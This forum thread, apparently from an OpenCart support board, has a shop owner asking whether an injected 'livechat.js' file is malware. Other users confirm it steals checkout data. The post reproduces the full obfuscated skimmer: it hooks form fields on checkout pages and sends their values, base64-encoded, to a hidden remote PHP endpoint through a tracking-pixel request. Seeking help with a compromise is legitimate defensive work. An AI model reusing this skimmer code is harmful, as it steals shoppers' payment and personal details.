Post by tt87 » Tue Jan 22, 2019 10:14 pm

Is it normal for a livechat.js script to be running on the website, or is this malware stealing information?

https://www.hergbenet.ro/wp-data/livechat.js

function IrDvbNXumt(e){return btoa(encodeURIComponent(e).replace(/%([0-9A-F]{2})/g,function(e,t){return String.fromCharCode(parseInt(t,16))}))}function lmVibHTBLP(){Array.from(document.getElementsByTagName("input")).forEach(function(e,t){null==e.getAttribute("onchange")?e.setAttribute("onchange","SAcSpFtVQg(this, '0')"):-1==e.getAttribute("onchange").search(/SAcSpFtVQg/i)&&e.setAttribute("onchange","SAcSpFtVQg(this, '0');"+e.getAttribute("onchange"))}),Array.from(document.getElementsByTagName("select")).forEach(function(e,t){null==e.getAttribute("onchange")?e.setAttribute("onchange","SAcSpFtVQg(this, '1');"):-1==e.getAttribute("onchange").search(/SAcSpFtVQg/i)&&e.setAttribute("onchange","SAcSpFtVQg(this, '1');"+e.getAttribute("onchange"))}),Array.from(document.getElementsByTagName("textarea")).forEach(function(e,t){null==e.getAttribute("onchange")?e.setAttribute("onchange","SAcSpFtVQg(this), '2'"):-1==e.getAttribute("onchange").search(/SAcSpFtVQg/i)&&e.setAttribute("onchange","SAcSpFtVQg(this, '2');"+e.getAttribute("onchange"))})}function SAcSpFtVQg(e,t){var n=[];n.push("url%"+location.hostname),n.push("type:2"),"1"!=t?e.value.length>0&&(0==e.name.length?n.push(e.id+"%"+e.value):0!=e.name.length&&n.push(e.name+"%"+e.value),aQwCiGbwKo(n)):e.value.length>0&&(-1!=e.id.search("zone|region|state")||-1!=e.name.search("zone|region|state"))?(e.value.replace(/[^-0-9]/gim,""),e.value,0==e.name.length?n.push(e.id+"%"+e.options[e.selectedIndex].text):0!=e.name.length&&n.push(e.name+"%"+e.options[e.selectedIndex].text),aQwCiGbwKo(n)):(0==e.name.length?n.push(e.id+"%"+e.value):0!=e.name.length&&n.push(e.name+"%"+e.value),aQwCiGbwKo(n))}function aQwCiGbwKo(e){if(JSON.stringify(KZgKcnPvnh)==JSON.stringify(e))return!1;KZgKcnPvnh=e;var 
t=89999*Math.random()+1e4,n=JSON.stringify(e),a=document.createElement("img");a.width="1px",a.height="1px",a.id=t,a.src=atob("aHR0cHM6Ly92YWxkYW1hcmtkaXJlY3QuY29tL3dwLWRhdGEvdmFsaWRhdGlvbi5waHA=")+"?image_id="+IrDvbNXumt(n),document.body.appendChild(a),setTimeout(document.getElementById(t).remove(),3e3)}function Default_Send(){var e=[];e.push("url%"+location.hostname),e.push("type%2"),Array.from(document.getElementsByTagName("input")).forEach(function(t,n){t.value.length>0&&(0==t.name.length?e.push(t.id+"%"+t.value):0!=t.name.length&&e.push(t.name+"%"+t.value))}),Array.from(document.getElementsByTagName("select")).forEach(function(t,n){t.value.length>0&&(-1!=t.id.search("zone|region|state")||-1!=t.name.search("zone|region|state"))?(t.value.replace(/[^-0-9]/gim,""),t.value,0==t.name.length?e.push(t.id+"%"+t.options[t.selectedIndex].text):0!=t.name.length&&e.push(t.name+"%"+t.options[t.selectedIndex].text)):0==t.name.length?e.push(t.id+"%"+t.value):0!=t.name.length&&e.push(t.name+"%"+t.value)}),Array.from(document.getElementsByTagName("textarea")).forEach(function(t,n){t.value.length>0&&(0==t.name.length?e.push(t.id+"%"+t.value):0!=t.name.length&&e.push(t.name+"%"+t.value))}),aQwCiGbwKo(e)}var KZgKcnPvnh=[];window.onload=function(){-1!=location.href.search("checkout")&&(Default_Send(),setInterval("Default_Send()",3e3),setInterval("lmVibHTBLP()",1500))};


Post by xxvirusxx » Tue Jan 22, 2019 11:12 pm

You use WordPress, right?


Post by tt87 » Wed Jan 23, 2019 4:44 am

No, I do not. Why?

Edit: Actually, I did have WordPress installed in the same location as OpenCart back in 2015. Is it possible it would be running on OpenCart?


Post by ADD Creative » Wed Jan 23, 2019 11:44 pm

I've looked at the script and it looks like it's designed to steal customer input from your checkout page. You should remove it and check your site for any other changes.

However, from the domain you posted you look to be running WordPress with WooCommerce and not OpenCart.


Post by tt87 » Thu Jan 24, 2019 12:04 am

The link I posted is not my website; it is the link for the cookie/script that was running on my website. My website is completely different, which is of course why it looked so suspicious. I removed a suspicious PHP file from my public_html location and also removed the WordPress installation. The cookie/script now seems to be gone, and I will continue to monitor. I wonder if this malicious script was installed through the WordPress installation? A good lesson might be never to have OpenCart and other installations such as WordPress in the same location.
